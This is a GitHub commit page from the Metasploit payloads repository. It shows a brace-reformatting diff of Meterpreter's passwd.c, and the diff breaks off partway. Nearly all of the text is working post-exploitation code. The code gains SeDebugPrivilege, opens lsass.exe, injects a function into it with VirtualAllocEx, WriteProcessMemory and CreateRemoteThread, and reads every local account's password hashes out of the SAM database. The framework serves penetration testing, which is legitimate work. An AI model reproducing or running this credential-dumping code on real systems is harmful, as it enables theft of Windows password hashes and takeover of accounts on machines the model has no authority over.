github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-04-12 04:12:05 +02:00
Code Releases Activity

Reformatting of code to make it a bit more readable

Browse Source
This commit is contained in:
OJ 2014-01-24 10:59:19 +10:00
parent 5b35852e32
commit e85ff80bb4
1 changed files with 333 additions and 113 deletions

446
c/meterpreter/source/extensions/priv/server/passwd.c

@ -12,18 +12,21 @@
#define SAM_USER_INFO_PASSWORD_OWFS 0x12 #define SAM_USER_INFO_PASSWORD_OWFS 0x12
/* define types for samsrv functions */ /* define types for samsrv functions */
typedef struct _SAM_DOMAIN_USER { typedef struct _SAM_DOMAIN_USER
{
DWORD dwUserId; DWORD dwUserId;
LSA_UNICODE_STRING wszUsername; LSA_UNICODE_STRING wszUsername;
} SAM_DOMAIN_USER; } SAM_DOMAIN_USER;
typedef struct _SAM_DOMAIN_USER_ENUMERATION { typedef struct _SAM_DOMAIN_USER_ENUMERATION
{
DWORD dwDomainUserCount; DWORD dwDomainUserCount;
SAM_DOMAIN_USER *pSamDomainUser; SAM_DOMAIN_USER *pSamDomainUser;
} SAM_DOMAIN_USER_ENUMERATION; } SAM_DOMAIN_USER_ENUMERATION;
/* define the type for passing data */ /* define the type for passing data */
typedef struct _USERNAMEHASH { typedef struct _USERNAMEHASH
{
char *Username; char *Username;
DWORD Length; DWORD Length;
DWORD RID; DWORD RID;
@ -40,7 +43,8 @@ typedef BOOL (WINAPI *CloseHandleType)(HANDLE);
typedef DWORD (WINAPI *WaitForSingleObjectType)(HANDLE, DWORD); typedef DWORD (WINAPI *WaitForSingleObjectType)(HANDLE, DWORD);
/* define the context/argument structure */ /* define the context/argument structure */
typedef struct { typedef struct
{
/* kernel32 function pointers */ /* kernel32 function pointers */
LoadLibraryType LoadLibrary; LoadLibraryType LoadLibrary;
@ -119,19 +123,26 @@ typedef size_t (*WcstombsType)(char *, const wchar_t *, size_t);
char *StringCombine(char *string1, char *string2) { char *StringCombine(char *string1, char *string2)
{
size_t s1len, s2len; size_t s1len, s2len;
if (string2 == NULL) { // nothing to append if (string2 == NULL)
{
// nothing to append
return string1; return string1;
} }
// TODO: what do we want to do if memory allocation fails? // TODO: what do we want to do if memory allocation fails?
s2len = strlen(string2); s2len = strlen(string2);
if (string1 == NULL) { // create a new string if (string1 == NULL)
{
// create a new string
string1 = (char *)malloc(s2len + 1); string1 = (char *)malloc(s2len + 1);
strncpy_s(string1, s2len + 1, string2, s2len + 1); strncpy_s(string1, s2len + 1, string2, s2len + 1);
} else { // append data to the string }
else
{ // append data to the string
s1len = strlen(string1); s1len = strlen(string1);
string1 = (char *)realloc(string1, s1len + s2len + 1); string1 = (char *)realloc(string1, s1len + s2len + 1);
strncat_s(string1, s1len + s2len + 1, string2, s2len + 1); strncat_s(string1, s1len + s2len + 1, string2, s2len + 1);
@ -141,7 +152,8 @@ char *StringCombine(char *string1, char *string2) {
} }
/* retrieve a handle to lsass.exe */ /* retrieve a handle to lsass.exe */
HANDLE GetLsassHandle() { HANDLE GetLsassHandle()
{
DWORD dwProcessList[1024]; DWORD dwProcessList[1024];
DWORD dwProcessListSize; DWORD dwProcessListSize;
@ -150,17 +162,24 @@ HANDLE GetLsassHandle() {
DWORD dwCount; DWORD dwCount;
/* enumerate all pids on the system */ /* enumerate all pids on the system */
if (EnumProcesses(dwProcessList, sizeof(dwProcessList), &dwProcessListSize)) { if (EnumProcesses(dwProcessList, sizeof(dwProcessList), &dwProcessListSize))
{
/* only look in the first 256 process ids for lsass.exe */ /* only look in the first 256 process ids for lsass.exe */
if (dwProcessListSize > sizeof(dwProcessList)) if (dwProcessListSize > sizeof(dwProcessList))
{
dwProcessListSize = sizeof(dwProcessList); dwProcessListSize = sizeof(dwProcessList);
}
/* iterate through all pids, retrieve the executable name, and match to lsass.exe */ /* iterate through all pids, retrieve the executable name, and match to lsass.exe */
for (dwCount = 0; dwCount < dwProcessListSize; dwCount++) { for (dwCount = 0; dwCount < dwProcessListSize; dwCount++)
if (hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessList[dwCount])) { {
if (GetModuleBaseName(hProcess, NULL, szProcessName, sizeof(szProcessName))) { if (hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessList[dwCount]))
if (strcmp(szProcessName, "lsass.exe") == 0) { {
if (GetModuleBaseName(hProcess, NULL, szProcessName, sizeof(szProcessName)))
{
if (strcmp(szProcessName, "lsass.exe") == 0)
{
return hProcess; return hProcess;
} }
} }
@ -172,19 +191,21 @@ HANDLE GetLsassHandle() {
} }
/* set the process to have the SE_DEBUG_NAME privilige */ /* set the process to have the SE_DEBUG_NAME privilige */
int SetAccessPriv() { int SetAccessPriv()
{
HANDLE hToken; HANDLE hToken;
TOKEN_PRIVILEGES priv; TOKEN_PRIVILEGES priv;
/* open the current process token, retrieve the LUID for SeDebug, enable the privilege, reset the token information */ /* open the current process token, retrieve the LUID for SeDebug, enable the privilege, reset the token information */
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) { if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid)) { {
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
{
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
priv.PrivilegeCount = 1; priv.PrivilegeCount = 1;
if (AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL)) { if (AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL))
{
CloseHandle(hToken); CloseHandle(hToken);
return 1; return 1;
} }
@ -194,8 +215,8 @@ int SetAccessPriv() {
return 0; return 0;
} }
int dumpSAM(FUNCTIONARGS *fargs) { int dumpSAM(FUNCTIONARGS *fargs)
{
/* variables for samsrv function pointers */ /* variables for samsrv function pointers */
HANDLE hSamSrv = NULL, hSam = NULL; HANDLE hSamSrv = NULL, hSam = NULL;
SamIConnectType pSamIConnect; SamIConnectType pSamIConnect;
@ -244,7 +265,11 @@ int dumpSAM(FUNCTIONARGS *fargs) {
/* load samsrv functions */ /* load samsrv functions */
hSamSrv = fargs->LoadLibrary(fargs->samsrvdll); hSamSrv = fargs->LoadLibrary(fargs->samsrvdll);
if (hSamSrv == NULL) { dwError = 1; goto cleanup; } if (hSamSrv == NULL)
{
dwError = 1;
goto cleanup;
}
pSamIConnect = (SamIConnectType)fargs->GetProcAddress(hSamSrv, fargs->samiconnect); pSamIConnect = (SamIConnectType)fargs->GetProcAddress(hSamSrv, fargs->samiconnect);
pSamrOpenDomain = (SamrOpenDomainType)fargs->GetProcAddress(hSamSrv, fargs->samropendomain); pSamrOpenDomain = (SamrOpenDomainType)fargs->GetProcAddress(hSamSrv, fargs->samropendomain);
@ -254,37 +279,63 @@ int dumpSAM(FUNCTIONARGS *fargs) {
pSamIFree_SAMPR_USER_INFO_BUFFER = (SamIFree_SAMPR_USER_INFO_BUFFERType)fargs->GetProcAddress(hSamSrv, fargs->samifree_sampr_user_info_buffer); pSamIFree_SAMPR_USER_INFO_BUFFER = (SamIFree_SAMPR_USER_INFO_BUFFERType)fargs->GetProcAddress(hSamSrv, fargs->samifree_sampr_user_info_buffer);
pSamIFree_SAMPR_ENUMERATION_BUFFER = (SamIFree_SAMPR_ENUMERATION_BUFFERType)fargs->GetProcAddress(hSamSrv, fargs->samifree_sampr_enumeration_buffer); pSamIFree_SAMPR_ENUMERATION_BUFFER = (SamIFree_SAMPR_ENUMERATION_BUFFERType)fargs->GetProcAddress(hSamSrv, fargs->samifree_sampr_enumeration_buffer);
pSamrCloseHandle = (SamrCloseHandleType)fargs->GetProcAddress(hSamSrv, fargs->samrclosehandle); pSamrCloseHandle = (SamrCloseHandleType)fargs->GetProcAddress(hSamSrv, fargs->samrclosehandle);
if (!pSamIConnect || !pSamrOpenDomain || !pSamrEnumerateUsersInDomain || !pSamrOpenUser || !pSamrQueryInformationUser || if (!pSamIConnect || !pSamrOpenDomain || !pSamrEnumerateUsersInDomain || !pSamrOpenUser || !pSamrQueryInformationUser ||
!pSamIFree_SAMPR_USER_INFO_BUFFER || !pSamIFree_SAMPR_ENUMERATION_BUFFER || !pSamrCloseHandle) { !pSamIFree_SAMPR_USER_INFO_BUFFER || !pSamIFree_SAMPR_ENUMERATION_BUFFER || !pSamrCloseHandle)
dwError = 1; {
goto cleanup; dwError = 1;
} goto cleanup;
}
/* load advadpi32 functions */ /* load advadpi32 functions */
hAdvApi32 = fargs->LoadLibrary(fargs->advapi32dll); hAdvApi32 = fargs->LoadLibrary(fargs->advapi32dll);
if (hAdvApi32 == NULL) { dwError = 1; goto cleanup; } if (hAdvApi32 == NULL)
{
dwError = 1;
goto cleanup;
}
pLsaOpenPolicy = (LsaOpenPolicyType)fargs->GetProcAddress(hAdvApi32, fargs->lsaopenpolicy); pLsaOpenPolicy = (LsaOpenPolicyType)fargs->GetProcAddress(hAdvApi32, fargs->lsaopenpolicy);
pLsaQueryInformationPolicy = (LsaQueryInformationPolicyType)fargs->GetProcAddress(hAdvApi32, fargs->lsaqueryinformationpolicy); pLsaQueryInformationPolicy = (LsaQueryInformationPolicyType)fargs->GetProcAddress(hAdvApi32, fargs->lsaqueryinformationpolicy);
pLsaClose = (LsaCloseType)fargs->GetProcAddress(hAdvApi32, fargs->lsaclose); pLsaClose = (LsaCloseType)fargs->GetProcAddress(hAdvApi32, fargs->lsaclose);
if (!pLsaOpenPolicy || !pLsaQueryInformationPolicy || !pLsaClose) { dwError = 1; goto cleanup; } if (!pLsaOpenPolicy || !pLsaQueryInformationPolicy || !pLsaClose)
{
dwError = 1;
goto cleanup;
}
/* load msvcrt functions */ /* load msvcrt functions */
hMsvcrt = fargs->LoadLibrary(fargs->msvcrtdll); hMsvcrt = fargs->LoadLibrary(fargs->msvcrtdll);
if (hMsvcrt == NULL) { dwError = 1; goto cleanup; } if (hMsvcrt == NULL)
{
dwError = 1;
goto cleanup;
}
pMalloc = (MallocType)fargs->GetProcAddress(hMsvcrt, fargs->malloc); pMalloc = (MallocType)fargs->GetProcAddress(hMsvcrt, fargs->malloc);
pRealloc = (ReallocType)fargs->GetProcAddress(hMsvcrt, fargs->realloc); pRealloc = (ReallocType)fargs->GetProcAddress(hMsvcrt, fargs->realloc);
pFree = (FreeType)fargs->GetProcAddress(hMsvcrt, fargs->free); pFree = (FreeType)fargs->GetProcAddress(hMsvcrt, fargs->free);
pMemcpy = (MemcpyType)fargs->GetProcAddress(hMsvcrt, fargs->memcpy); pMemcpy = (MemcpyType)fargs->GetProcAddress(hMsvcrt, fargs->memcpy);
if (!pMalloc || !pRealloc || !pFree || !pMemcpy) { dwError = 1; goto cleanup; } if (!pMalloc || !pRealloc || !pFree || !pMemcpy)
{
dwError = 1;
goto cleanup;
}
/* load ntdll functions */ /* load ntdll functions */
hNtDll = fargs->LoadLibrary(fargs->ntdlldll); hNtDll = fargs->LoadLibrary(fargs->ntdlldll);
if (hNtDll == NULL) { dwError = 1; goto cleanup; } if (hNtDll == NULL)
{
dwError = 1;
goto cleanup;
}
pWcstombs = (WcstombsType)fargs->GetProcAddress(hNtDll, fargs->wcstombs); pWcstombs = (WcstombsType)fargs->GetProcAddress(hNtDll, fargs->wcstombs);
if (!pWcstombs) { dwError = 1; goto cleanup; } if (!pWcstombs)
{
dwError = 1;
goto cleanup;
}
/* initialize the LSA_OBJECT_ATTRIBUTES structure */ /* initialize the LSA_OBJECT_ATTRIBUTES structure */
ObjectAttributes.RootDirectory = NULL; ObjectAttributes.RootDirectory = NULL;
@ -295,39 +346,83 @@ int dumpSAM(FUNCTIONARGS *fargs) {
ObjectAttributes.Length = sizeof(LSA_OBJECT_ATTRIBUTES); ObjectAttributes.Length = sizeof(LSA_OBJECT_ATTRIBUTES);
/* open a handle to the LSA policy */ /* open a handle to the LSA policy */
if (pLsaOpenPolicy(NULL, &ObjectAttributes, POLICY_ALL_ACCESS, &hLSA) < 0) { dwError = 1; goto cleanup; } if (pLsaOpenPolicy(NULL, &ObjectAttributes, POLICY_ALL_ACCESS, &hLSA) < 0)
if (pLsaQueryInformationPolicy(hLSA, PolicyAccountDomainInformation, &pAcctDomainInfo) < 0) { dwError = 1; goto cleanup; } {
dwError = 1;
goto cleanup;
}
if (pLsaQueryInformationPolicy(hLSA, PolicyAccountDomainInformation, &pAcctDomainInfo) < 0)
{
dwError = 1;
goto cleanup;
}
/* connect to the SAM database */ /* connect to the SAM database */
if (pSamIConnect(0, &hSam, MAXIMUM_ALLOWED, 1) < 0) { dwError = 1; goto cleanup; } if (pSamIConnect(0, &hSam, MAXIMUM_ALLOWED, 1) < 0)
if (pSamrOpenDomain(hSam, 0xf07ff, pAcctDomainInfo->DomainSid, &hDomain) < 0) { dwError = 1; goto cleanup; } {
dwError = 1;
goto cleanup;
}
if (pSamrOpenDomain(hSam, 0xf07ff, pAcctDomainInfo->DomainSid, &hDomain) < 0)
{
dwError = 1;
goto cleanup;
}
/* enumerate all users and store username, rid, and hashes */ /* enumerate all users and store username, rid, and hashes */
do { do
{
status = pSamrEnumerateUsersInDomain(hDomain, &hEnumerationHandle, 0, &pEnumeratedUsers, 0xFFFF, &dwNumberOfUsers); status = pSamrEnumerateUsersInDomain(hDomain, &hEnumerationHandle, 0, &pEnumeratedUsers, 0xFFFF, &dwNumberOfUsers);
if (status < 0) { break; } // error if (status < 0)
{
break;
} // error
// 0x0 = no more, 0x105 = more users // 0x0 = no more, 0x105 = more users
if (!dwNumberOfUsers) { break; } // exit if no users remain if (!dwNumberOfUsers)
{
break;
} // exit if no users remain
if (fargs->dwDataSize == 0) { // first allocation if (fargs->dwDataSize == 0)
{ // first allocation
fargs->dwDataSize = dwNumberOfUsers * sizeof(USERNAMEHASH); fargs->dwDataSize = dwNumberOfUsers * sizeof(USERNAMEHASH);
fargs->pUsernameHashData = pMalloc(fargs->dwDataSize); fargs->pUsernameHashData = pMalloc(fargs->dwDataSize);
} else { // subsequent allocations }
else
{ // subsequent allocations
fargs->dwDataSize += dwNumberOfUsers * sizeof(USERNAMEHASH); fargs->dwDataSize += dwNumberOfUsers * sizeof(USERNAMEHASH);
fargs->pUsernameHashData = pRealloc(fargs->pUsernameHashData, fargs->dwDataSize); fargs->pUsernameHashData = pRealloc(fargs->pUsernameHashData, fargs->dwDataSize);
} }
if (fargs->pUsernameHashData == NULL) { dwError = 1; goto cleanup; } if (fargs->pUsernameHashData == NULL)
{
dwError = 1;
goto cleanup;
}
for (dwCurrentUser = 0; dwCurrentUser < dwNumberOfUsers; dwCurrentUser++) { for (dwCurrentUser = 0; dwCurrentUser < dwNumberOfUsers; dwCurrentUser++)
{
if (pSamrOpenUser(hDomain, MAXIMUM_ALLOWED, pEnumeratedUsers->pSamDomainUser[dwCurrentUser].dwUserId, &hUser) < 0) { dwError = 1; goto cleanup; } if (pSamrOpenUser(hDomain, MAXIMUM_ALLOWED, pEnumeratedUsers->pSamDomainUser[dwCurrentUser].dwUserId, &hUser) < 0)
if (pSamrQueryInformationUser(hUser, SAM_USER_INFO_PASSWORD_OWFS, &pvUserInfo) < 0) { dwError = 1; goto cleanup; } {
dwError = 1;
goto cleanup;
}
if (pSamrQueryInformationUser(hUser, SAM_USER_INFO_PASSWORD_OWFS, &pvUserInfo) < 0)
{
dwError = 1;
goto cleanup;
}
/* allocate space for another username */ /* allocate space for another username */
dwUsernameLength = (pEnumeratedUsers->pSamDomainUser[dwCurrentUser].wszUsername.Length / 2); dwUsernameLength = (pEnumeratedUsers->pSamDomainUser[dwCurrentUser].wszUsername.Length / 2);
(fargs->pUsernameHashData)[dwStorageIndex].Username = (char *)pMalloc(dwUsernameLength + 1); (fargs->pUsernameHashData)[dwStorageIndex].Username = (char *)pMalloc(dwUsernameLength + 1);
if ((fargs->pUsernameHashData)[dwStorageIndex].Username == NULL) { dwError = 1; goto cleanup; } if ((fargs->pUsernameHashData)[dwStorageIndex].Username == NULL)
for ( i=0; i < (dwUsernameLength + 1); i++ ) { {
dwError = 1;
goto cleanup;
}
for ( i=0; i < (dwUsernameLength + 1); i++ )
{
(fargs->pUsernameHashData)[dwStorageIndex].Username[i] = 0; (fargs->pUsernameHashData)[dwStorageIndex].Username[i] = 0;
} }
@ -354,18 +449,35 @@ int dumpSAM(FUNCTIONARGS *fargs) {
/* set the event to signify that the data is ready */ /* set the event to signify that the data is ready */
hReadLock = fargs->OpenEvent(EVENT_MODIFY_STATE, FALSE, fargs->ReadSyncEvent); hReadLock = fargs->OpenEvent(EVENT_MODIFY_STATE, FALSE, fargs->ReadSyncEvent);
if (hReadLock == NULL) { dwError = 1; goto cleanup; } if (hReadLock == NULL)
if (fargs->SetEvent(hReadLock) == 0) { dwError = 1; goto cleanup; } {
dwError = 1;
goto cleanup;
}
if (fargs->SetEvent(hReadLock) == 0)
{
dwError = 1;
goto cleanup;
}
/* wait for the copying to finish before freeing all the allocated memory */ /* wait for the copying to finish before freeing all the allocated memory */
hFreeLock = fargs->OpenEvent(EVENT_ALL_ACCESS, FALSE, fargs->FreeSyncEvent); hFreeLock = fargs->OpenEvent(EVENT_ALL_ACCESS, FALSE, fargs->FreeSyncEvent);
if (hFreeLock == NULL) { dwError = 1; goto cleanup; } if (hFreeLock == NULL)
if (fargs->WaitForSingleObject(hFreeLock, fargs->dwMillisecondsToWait) != WAIT_OBJECT_0) { dwError = 1; goto cleanup; } {
dwError = 1;
goto cleanup;
}
if (fargs->WaitForSingleObject(hFreeLock, fargs->dwMillisecondsToWait) != WAIT_OBJECT_0)
{
dwError = 1;
goto cleanup;
}
cleanup: cleanup:
/* free all the allocated memory */ /* free all the allocated memory */
for (dwCurrentUser = 0; dwCurrentUser < dwStorageIndex; dwCurrentUser++) { for (dwCurrentUser = 0; dwCurrentUser < dwStorageIndex; dwCurrentUser++)
{
pFree((fargs->pUsernameHashData)[dwCurrentUser].Username); pFree((fargs->pUsernameHashData)[dwCurrentUser].Username);
} }
pFree(fargs->pUsernameHashData); pFree(fargs->pUsernameHashData);
@ -376,10 +488,21 @@ cleanup:
pLsaClose(hLSA); pLsaClose(hLSA);
/* free library handles */ /* free library handles */
if (hSamSrv) { fargs->FreeLibrary(hSamSrv); } if (hSamSrv)
if (hAdvApi32) { fargs->FreeLibrary(hAdvApi32); } {
if (hMsvcrt) { fargs->FreeLibrary(hMsvcrt); } fargs->FreeLibrary(hSamSrv); }
if (hNtDll) { fargs->FreeLibrary(hNtDll); } if (hAdvApi32)
{
fargs->FreeLibrary(hAdvApi32);
}
if (hMsvcrt)
{
fargs->FreeLibrary(hMsvcrt);
}
if (hNtDll)
{
fargs->FreeLibrary(hNtDll);
}
/* signal that the memory deallocation is complete */ /* signal that the memory deallocation is complete */
fargs->SetEvent(hReadLock); fargs->SetEvent(hReadLock);
@ -399,13 +522,17 @@ void sizer() { __asm { ret } }
#endif #endif
/* initialize the context structure - returns 0 on success, return 1 on error */ /* initialize the context structure - returns 0 on success, return 1 on error */
int setArgs(FUNCTIONARGS *fargs, DWORD dwMillisecondsToWait) { int setArgs(FUNCTIONARGS *fargs, DWORD dwMillisecondsToWait)
{
HMODULE hLibrary = NULL; HMODULE hLibrary = NULL;
/* set loadlibrary and getprocaddress function addresses */ /* set loadlibrary and getprocaddress function addresses */
hLibrary = LoadLibrary("kernel32"); hLibrary = LoadLibrary("kernel32");
if (hLibrary == NULL) { return 1; } if (hLibrary == NULL)
{
return 1;
}
fargs->LoadLibrary = (LoadLibraryType)GetProcAddress(hLibrary, "LoadLibraryA"); fargs->LoadLibrary = (LoadLibraryType)GetProcAddress(hLibrary, "LoadLibraryA");
fargs->GetProcAddress = (GetProcAddressType)GetProcAddress(hLibrary, "GetProcAddress"); fargs->GetProcAddress = (GetProcAddressType)GetProcAddress(hLibrary, "GetProcAddress");
@ -415,7 +542,8 @@ int setArgs(FUNCTIONARGS *fargs, DWORD dwMillisecondsToWait) {
fargs->CloseHandle = (CloseHandleType)GetProcAddress(hLibrary, "CloseHandle"); fargs->CloseHandle = (CloseHandleType)GetProcAddress(hLibrary, "CloseHandle");
fargs->WaitForSingleObject = (WaitForSingleObjectType)GetProcAddress(hLibrary, "WaitForSingleObject"); fargs->WaitForSingleObject = (WaitForSingleObjectType)GetProcAddress(hLibrary, "WaitForSingleObject");
if (!fargs->LoadLibrary || !fargs->GetProcAddress || !fargs->FreeLibrary || !fargs->OpenEvent || !fargs->SetEvent || !fargs->CloseHandle || !fargs->WaitForSingleObject) { if (!fargs->LoadLibrary || !fargs->GetProcAddress || !fargs->FreeLibrary || !fargs->OpenEvent || !fargs->SetEvent || !fargs->CloseHandle || !fargs->WaitForSingleObject)
{
CloseHandle(hLibrary); CloseHandle(hLibrary);
return 1; return 1;
} }
@ -470,7 +598,8 @@ control function driving the dumping - return 0 on success, 1 on error
dwMillisecondsToWait = basically controls how long to wait for the results dwMillisecondsToWait = basically controls how long to wait for the results
*/ */
int __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults) { int __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults)
{
HANDLE hThreadHandle = NULL, hLsassHandle = NULL, hReadLock = NULL, hFreeLock = NULL; HANDLE hThreadHandle = NULL, hLsassHandle = NULL, hReadLock = NULL, hFreeLock = NULL;
LPVOID pvParameterMemory = NULL, pvFunctionMemory = NULL; LPVOID pvParameterMemory = NULL, pvFunctionMemory = NULL;
@ -487,27 +616,39 @@ int __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults
char buffer[100]; char buffer[100];
/* END METERPRETER CODE */ /* END METERPRETER CODE */
do { do
{
/* ORANGE control input - move this to the client perl side */ /* ORANGE control input - move this to the client perl side */
if (dwMillisecondsToWait < 60000) { dwMillisecondsToWait = 60000; } if (dwMillisecondsToWait < 60000)
if (dwMillisecondsToWait > 300000) { dwMillisecondsToWait = 300000; } {
dwMillisecondsToWait = 60000;
}
if (dwMillisecondsToWait > 300000)
{
dwMillisecondsToWait = 300000;
}
/* create the event kernel sync objects */ /* create the event kernel sync objects */
hReadLock = CreateEvent(NULL, FALSE, FALSE, "SAM"); hReadLock = CreateEvent(NULL, FALSE, FALSE, "SAM");
hFreeLock = CreateEvent(NULL, FALSE, FALSE, "FREE"); hFreeLock = CreateEvent(NULL, FALSE, FALSE, "FREE");
if (!hReadLock || !hFreeLock) { dwError = 1; break; } if (!hReadLock || !hFreeLock)
{
dwError = 1; break;
}
/* calculate the function size */ /* calculate the function size */
FunctionSize = (DWORD)sizer - (DWORD)dumpSAM; FunctionSize = (DWORD)sizer - (DWORD)dumpSAM;
if (FunctionSize <= 0) { if (FunctionSize <= 0)
{
dprintf("Error calculating the function size.\n"); dprintf("Error calculating the function size.\n");
dwError = 1; dwError = 1;
break; break;
} }
/* set access priv */ /* set access priv */
if (SetAccessPriv() == 0) { if (SetAccessPriv() == 0)
{
dprintf("Error setting SE_DEBUG_NAME privilege\n"); dprintf("Error setting SE_DEBUG_NAME privilege\n");
dwError = 1; dwError = 1;
break; break;
@ -515,82 +656,138 @@ int __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults
/* get the lsass handle */ /* get the lsass handle */
hLsassHandle = GetLsassHandle(); hLsassHandle = GetLsassHandle();
if (hLsassHandle == 0) { if (hLsassHandle == 0)
{
dprintf("Error getting lsass.exe handle.\n"); dprintf("Error getting lsass.exe handle.\n");
dwError = 1; dwError = 1;
break; break;
} }
/* set the arguments in the context structure */ /* set the arguments in the context structure */
if (setArgs(&InitFunctionArguments, dwMillisecondsToWait)) { dwError = 1; break; } if (setArgs(&InitFunctionArguments, dwMillisecondsToWait))
{
dwError = 1; break;
}
/* allocate memory for the context structure */ /* allocate memory for the context structure */
pvParameterMemory = VirtualAllocEx(hLsassHandle, NULL, sizeof(FUNCTIONARGS), MEM_COMMIT, PAGE_EXECUTE_READWRITE); pvParameterMemory = VirtualAllocEx(hLsassHandle, NULL, sizeof(FUNCTIONARGS), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (pvParameterMemory == NULL) { dwError = 1; break; } if (pvParameterMemory == NULL)
{
dwError = 1; break;
}
/* write context structure into remote process */ /* write context structure into remote process */
if (WriteProcessMemory(hLsassHandle, pvParameterMemory, &InitFunctionArguments, sizeof(InitFunctionArguments), &sBytesWritten) == 0) { dwError = 1; break; } if (WriteProcessMemory(hLsassHandle, pvParameterMemory, &InitFunctionArguments, sizeof(InitFunctionArguments), &sBytesWritten) == 0)
if (sBytesWritten != sizeof(InitFunctionArguments)) { dwError = 1; break; } {
dwError = 1; break;
}
if (sBytesWritten != sizeof(InitFunctionArguments))
{
dwError = 1; break;
}
sBytesWritten = 0; sBytesWritten = 0;
/* allocate memory for the function */ /* allocate memory for the function */
pvFunctionMemory = VirtualAllocEx(hLsassHandle, NULL, FunctionSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); pvFunctionMemory = VirtualAllocEx(hLsassHandle, NULL, FunctionSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (pvFunctionMemory == NULL) { dwError = 1; break; } if (pvFunctionMemory == NULL)
{
dwError = 1; break;
}
/* write the function into the remote process */ /* write the function into the remote process */
if (WriteProcessMemory(hLsassHandle, pvFunctionMemory, dumpSAM, FunctionSize, &sBytesWritten) == 0) { dwError = 1; break; } if (WriteProcessMemory(hLsassHandle, pvFunctionMemory, dumpSAM, FunctionSize, &sBytesWritten) == 0)
if (sBytesWritten != FunctionSize) { dwError = 1; break; } {
dwError = 1; break;
}
if (sBytesWritten != FunctionSize)
{
dwError = 1; break;
}
sBytesWritten = 0; sBytesWritten = 0;
/* start the remote thread */ /* start the remote thread */
if ((hThreadHandle = CreateRemoteThread(hLsassHandle, NULL, 0, (LPTHREAD_START_ROUTINE)pvFunctionMemory, pvParameterMemory, 0, &dwThreadId)) == NULL) { dwError = 1; break; } if ((hThreadHandle = CreateRemoteThread(hLsassHandle, NULL, 0, (LPTHREAD_START_ROUTINE)pvFunctionMemory, pvParameterMemory, 0, &dwThreadId)) == NULL)
{
dwError = 1; break;
}
/* wait until the data is ready to be collected */ /* wait until the data is ready to be collected */
if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0) { if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0)
{
dprintf("Timed out waiting for the data to be collected.\n"); dprintf("Timed out waiting for the data to be collected.\n");
dwError = 1; dwError = 1;
break; break;
} }
/* read results of the injected function */ /* read results of the injected function */
if (ReadProcessMemory(hLsassHandle, pvParameterMemory, &FinalFunctionArguments, sizeof(InitFunctionArguments), &sBytesRead) == 0) { dwError = 1; break; } if (ReadProcessMemory(hLsassHandle, pvParameterMemory, &FinalFunctionArguments, sizeof(InitFunctionArguments), &sBytesRead) == 0)
if (sBytesRead != sizeof(InitFunctionArguments)) { dwError = 1; break; } {
dwError = 1; break;
}
if (sBytesRead != sizeof(InitFunctionArguments))
{
dwError = 1; break;
}
sBytesRead = 0; sBytesRead = 0;
/* allocate space for the results */ /* allocate space for the results */
UsernameHashResults = (USERNAMEHASH *)malloc(FinalFunctionArguments.dwDataSize); UsernameHashResults = (USERNAMEHASH *)malloc(FinalFunctionArguments.dwDataSize);
if (UsernameHashResults == NULL) { dwError = 1; break; } if (UsernameHashResults == NULL)
{
dwError = 1; break;
}
/* determine the number of elements and copy over the data */ /* determine the number of elements and copy over the data */
dwNumberOfUsers = FinalFunctionArguments.dwDataSize / sizeof(USERNAMEHASH); dwNumberOfUsers = FinalFunctionArguments.dwDataSize / sizeof(USERNAMEHASH);
/* copy the context structure */ /* copy the context structure */
if (ReadProcessMemory(hLsassHandle, FinalFunctionArguments.pUsernameHashData, UsernameHashResults, FinalFunctionArguments.dwDataSize, &sBytesRead) == 0) { break; } if (ReadProcessMemory(hLsassHandle, FinalFunctionArguments.pUsernameHashData, UsernameHashResults, FinalFunctionArguments.dwDataSize, &sBytesRead) == 0)
if (sBytesRead != FinalFunctionArguments.dwDataSize) { break; } {
break;
}
if (sBytesRead != FinalFunctionArguments.dwDataSize)
{
break;
}
sBytesRead = 0; sBytesRead = 0;
// save the old mem addy, malloc new space, copy over the data, free the old mem addy // save the old mem addy, malloc new space, copy over the data, free the old mem addy
for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++) { for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
{
UsernameAddress = UsernameHashResults[dwCurrentUserIndex].Username; UsernameAddress = UsernameHashResults[dwCurrentUserIndex].Username;
UsernameHashResults[dwCurrentUserIndex].Username = (char *)malloc(UsernameHashResults[dwCurrentUserIndex].Length + 1);
if (UsernameHashResults[dwCurrentUserIndex].Username == NULL) { dwError = 1; break; }
if (ReadProcessMemory(hLsassHandle, UsernameAddress, UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].Length, &sBytesRead) == 0) { dwError = 1; break; } UsernameHashResults[dwCurrentUserIndex].Username = (char *)malloc(UsernameHashResults[dwCurrentUserIndex].Length + 1);
if (sBytesRead != UsernameHashResults[dwCurrentUserIndex].Length) { dwError = 1; break; } if (UsernameHashResults[dwCurrentUserIndex].Username == NULL)
UsernameHashResults[dwCurrentUserIndex].Username[ UsernameHashResults[dwCurrentUserIndex].Length ] = 0; {
dwError = 1; break;
}
if (ReadProcessMemory(hLsassHandle, UsernameAddress, UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].Length, &sBytesRead) == 0)
{
dwError = 1; break;
}
